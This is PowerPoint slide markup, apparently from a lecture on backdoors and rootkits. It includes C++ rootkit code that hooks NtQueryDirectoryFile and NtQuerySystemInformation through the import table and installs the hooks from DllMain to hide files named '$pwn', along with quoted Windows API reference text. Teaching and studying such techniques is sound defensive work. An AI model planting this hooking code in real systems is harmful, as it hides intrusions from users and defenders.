            <a:srgbClr val="E74C3C">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>//this function is to hide certain files with name including "$pwn"</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NTSTATUS WINAPI hkNtQueryDirectoryFile(HANDLE FileHandle, HANDLE Event, PIO_APC_ROUTINE ApcRoutine, PVOID ApcContext, PIO_STATUS_BLOCK IoStatusBlock, PVOID FileInformation, ULONG Length, FILE_INFORMATION_CLASS FileInformationClass, BOOLEAN ReturnSingleEntry, PUNICODE_STRING FileName, BOOLEAN RestartScan)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//returns information about files and directories in a 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const NTSTATUS QueryStatus = lpOrgNtQueryDirectoryFile(FileHandle, Event, ApcRoutine, ApcContext, IoStatusBlock, FileInformation, Length, FileInformationClass, ReturnSingleEntry, FileName, RestartScan); </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(FileInformationClass == FILE_INFORMATION_CLASS::FileIdBothDirectoryInformation &amp;&amp; QueryStatus == STATUS_SUCCESS)</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PFILE_ID_BOTH_DIR_INFORMATION lpCurrentDirectory;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auto lpNextDirectory = (PFILE_ID_BOTH_DIR_INFORMATION)FileInformation;</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do</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lpCurrentDirectory = lpNextDirectory;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lpNextDirectory = (PFILE_ID_BOTH_DIR_INFORMATION)((DWORD_PTR)lpCurrentDirectory + lpCurrentDirectory-&gt;NextEntryOffset); //obtain the next file information</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wcstombs_s(nullptr, lpCurrentDirectoryName, lpNextDirectory-&gt;FileName, MAX_PATH); //Converts a sequence of wide characters to a corresponding sequence of multibyte characters</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lpCurrentDirectoryName[MAX_PATH - 1] = '\0';</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(StrStrIA(lpCurrentDirectoryName, "$pwn")) //trying to hide the next file ("$pwn")</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if (lpNextDirectory-&gt;NextEntryOffset == 0)</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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lpCurrentDirectory-&gt;NextEntryOffset =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else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r>
              <a:rPr sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>lpCurrentDirectory-&gt;NextEntryOffset += lpNextDirectory-&gt;NextEntryOffset;</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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lpNextDirectory = lpCurrentDirectory;</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 while (lpCurrentDirectory-&gt;NextEntryOffset !=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QueryStatus;</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15625 0 L 0.00505208 -0.593426 " pathEditMode="relative" rAng="0" ptsTypes="">
                                      <p:cBhvr>
                                        <p:cTn id="6" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="-335"/>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Example-DllMain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94310" y="1047115"/>
            <a:ext cx="11803380" cy="9093835"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E74C3C">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>void InitHook()//hook NtQuerySystemInformation by self defined hkNtQuerySystemInformation and NtQueryDirectoryFile by self defined hkNtQueryDirectoryFile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lpOrgNtQuerySystemInformation = (lpNtQuerySystemInformation) IAT::Hook("ntdll.dll", "NtQuerySystemInformation", &amp;hkNtQuerySystemInformation);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lpOrgNtQueryDirectoryFile = (lpNtQueryDirectoryFile) IAT::Hook("ntdll.dll", "NtQueryDirectoryFile", &amp;hkNtQueryDirectoryFile, "windows.storage.dll");</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ExitThread(0);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void RemoveHookAndFreeLibrary(const HMODULE hModule)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IAT::Hook("ntdll.dll", "NtQuerySystemInformation", (LPVOID)lpOrgNtQuerySystemInformation);</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IAT::Hook("ntdll.dll", "NtQueryDirectoryFile", (LPVOID)lpOrgNtQueryDirectoryFile, "windows.storage.dll");</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FreeLibraryAndExitThread(hModule, 0);</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BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)</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switch (ul_reason_for_call)</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case DLL_PROCESS_ATTACH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DisableThreadLibraryCalls(hModule); //Disables the DLL_THREAD_ATTACH and DLL_THREAD_DETACH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>notifications for the specified dynamic-link library (DLL).</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CreateThread(nullptr, NULL, (LPTHREAD_START_ROUTINE)InitHook, nullptr, 0, nullptr);</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break;</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case DLL_PROCESS_DETACH :</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RemoveHookAndFreeLibrary(hModule);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break;</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default:</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FALSE;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a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>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    return TRUE;</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr sz="15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505208 -0.571574 " pathEditMode="relative" rAng="0" ptsTypes="">
                                      <p:cBhvr>
                                        <p:cTn id="6" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="-293"/>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GetProcessImageFileNameA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36575" y="4344670"/>
            <a:ext cx="11655425" cy="1509395"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>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hProcess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handle to the process.</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[out] lpImageFileName</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a buffer that receives the full path to the executable file.</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[in] nSize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lpImageFileName buffer, in characters.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="22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793115" y="1235075"/>
            <a:ext cx="5170805" cy="2861310"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D1202F">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="D1202F"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>DWORD GetProcessImageFileNameA(</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[in]  HANDLE hProcess,</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[out] LPSTR  lpImageFileName,</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  [in]  DWORD  nSize</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="15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2" name="组合 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="6594475" y="1758315"/>
            <a:ext cx="4805045" cy="1814830"/>
            <a:chOff x="11465" y="2185"/>
            <a:chExt cx="7567" cy="2858"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="圆角矩形 2"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId4"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11465" y="2185"/>
              <a:ext cx="7567" cy="2859"/>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466" y="2561"/>
              <a:ext cx="7566"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Retrieves the name of the executable file for the specified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5685155"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D1202F"/>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D1202F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Overview</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cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="组合 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3240405" y="1941195"/>
            <a:ext cx="5711190" cy="3220720"/>
            <a:chOff x="4964" y="3057"/>
            <a:chExt cx="8994" cy="5072"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="5" name="组合 4"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="0">
              <a:off x="4964" y="6115"/>
              <a:ext cx="8995" cy="2014"/>
              <a:chOff x="1726" y="2132"/>
              <a:chExt cx="8995" cy="2014"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="13" name="圆角矩形 6"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId1"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2238" y="2251"/>
                <a:ext cx="8483" cy="1776"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 50000"/>
                </a:avLst>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="20E4F9"/>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4" name="椭圆 13"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId2"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1726" y="2132"/>
                <a:ext cx="2014" cy="2014"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="08BDCD"/>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6" name="椭圆 15"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId3"/>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17" name="文本框 16"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId4"/>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rPr>
                  <a:t>02</a:t>
                </a:r>
                <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="300" normalizeH="0" baseline="0" noProof="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="10BDCC"/>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18" name="文本框 17"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId5"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3741" y="2281"/>
                <a:ext cx="6979"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rPr>
                  <a:t>Backdoors</a:t>
                </a:r>
                <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="3000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
                  <a:cs typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="19" name="组合 2"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="0">
              <a:off x="4964" y="3057"/>
              <a:ext cx="8995" cy="2014"/>
              <a:chOff x="1726" y="2132"/>
              <a:chExt cx="8995" cy="2014"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="20" name="圆角矩形 19"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId6"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2238" y="2251"/>
                <a:ext cx="8483" cy="1776"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 50000"/>
                </a:avLst>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FF4338"/>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2" name="椭圆 14"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId7"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1726" y="2132"/>
                <a:ext cx="2014" cy="2014"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="E80A00"/>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3" name="椭圆 20"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId8"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1865" y="2271"/>
                <a:ext cx="1736" cy="1736"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
                <a:noFill/>
                <a:prstDash val="solid"/>
                <a:miter lim="800000"/>
              </a:ln>
              <a:effectLst>
                <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
                  <a:srgbClr val="FFFFFF">
                    <a:lumMod val="65000"/>
                    <a:alpha val="40000"/>
                  </a:srgbClr>
                </a:outerShdw>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Segoe UI" panose="020B0502040204020203"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
                  <a:cs typeface="+mn-cs"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="24" name="文本框 26"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId9"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1864" y="2665"/>
                <a:ext cx="1736" cy="949"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" bIns="0" rtlCol="0" anchor="ctr" anchorCtr="0">
                <a:normAutofit fontScale="87500"/>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rPr>
                  <a:t>01</a:t>
                </a:r>
                <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="300" normalizeH="0" baseline="0" noProof="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="E60D03"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
                  <a:ea typeface="思源黑体 CN Bold" panose="020B0800000000000000" charset="-122"/>
                  <a:cs typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="25" name="文本框 27"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId10"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3741" y="2281"/>
                <a:ext cx="6980" cy="1716"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0" anchor="ctr" anchorCtr="0">
                <a:noAutofit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="en-US"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                  <a:defRPr sz="1800" kern="1200">
                    <a:solidFill>
                      <a:sysClr val="windowText" lastClr="000000"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                    <a:ea typeface="+mn-ea"/>
                    <a:cs typeface="+mn-ea"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                  <a:defRPr sz="1800" kern="1200">
                    <a:solidFill>
                      <a:sysClr val="windowText" lastClr="000000"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                    <a:ea typeface="+mn-ea"/>
                    <a:cs typeface="+mn-ea"/>
                  </a:defRPr>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                  <a:defRPr sz="1800" kern="1200">
                    <a:solidFill>
                      <a:sysClr val="windowText" lastClr="000000"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                    <a:ea typeface="+mn-ea"/>
                    <a:cs typeface="+mn-ea"/>
                  </a:defRPr>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                  <a:defRPr sz="1800" kern="1200">
                    <a:solidFill>
                      <a:sysClr val="windowText" lastClr="000000"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                    <a:ea typeface="+mn-ea"/>
                    <a:cs typeface="+mn-ea"/>
                  </a:defRPr>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                  <a:defRPr sz="1800" kern="1200">
                    <a:solidFill>
                      <a:sysClr val="windowText" lastClr="000000"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                    <a:ea typeface="+mn-ea"/>
                    <a:cs typeface="+mn-ea"/>
                  </a:defRPr>
                </a:lvl5pPr>
                <a:lvl6pPr marL="2286000" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                  <a:defRPr sz="1800" kern="1200">
                    <a:solidFill>
                      <a:sysClr val="windowText" lastClr="000000"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                    <a:ea typeface="+mn-ea"/>
                    <a:cs typeface="+mn-ea"/>
                  </a:defRPr>
                </a:lvl6pPr>
                <a:lvl7pPr marL="2743200" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                  <a:defRPr sz="1800" kern="1200">
                    <a:solidFill>
                      <a:sysClr val="windowText" lastClr="000000"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                    <a:ea typeface="+mn-ea"/>
                    <a:cs typeface="+mn-ea"/>
                  </a:defRPr>
                </a:lvl7pPr>
                <a:lvl8pPr marL="3200400" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                  <a:defRPr sz="1800" kern="1200">
                    <a:solidFill>
                      <a:sysClr val="windowText" lastClr="000000"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                    <a:ea typeface="+mn-ea"/>
                    <a:cs typeface="+mn-ea"/>
                  </a:defRPr>
                </a:lvl8pPr>
                <a:lvl9pPr marL="3657600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                  <a:defRPr sz="1800" kern="1200">
                    <a:solidFill>
                      <a:sysClr val="windowText" lastClr="000000"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                    <a:ea typeface="+mn-ea"/>
                    <a:cs typeface="+mn-ea"/>
                  </a:defRPr>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                  <a:lnSpc>
                    <a:spcPct val="100000"/>
                  </a:lnSpc>
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:buClrTx/>
                  <a:buSzTx/>
                  <a:buFontTx/>
                  <a:buNone/>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <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rPr>
                  <a:t>Rootkits</a:t>
                </a:r>
                <a:endParaRPr kumimoji="0" sz="3000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
                  <a:sym typeface="+mn-lt"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:gr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MODULEENTRY32</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5873115" y="2952750"/>
            <a:ext cx="6169660" cy="3350895"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>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dwSize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structure, in bytes. </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th32ProcessID</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identifier of the process whose modules are to be examined.</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modBaseAddr</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base address of the module in the context of the owning process.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>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hModule</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A handle to the module in the context of the owning process.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="9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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>szModule[MAX_MODULE_NAME32 + 1]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>The module name.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="10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197485" y="1170940"/>
            <a:ext cx="5577205" cy="4523105"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D1202F">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="D1202F"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>typedef struct tagMODULEENTRY32 {</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dwSize;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th32ModuleID;</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th32ProcessID;</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GlblcntUsage;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ProccntUsage;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BYTE    *modBaseAddr;</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DWORD   modBaseSize;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HMODULE hModule;</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char    szModule[MAX_MODULE_NAME32 + 1];</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char    szExePath[MAX_PATH];</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>} MODULEENTRY32;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="组合 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6157595" y="1170940"/>
            <a:ext cx="5744210" cy="1576070"/>
            <a:chOff x="10385" y="2770"/>
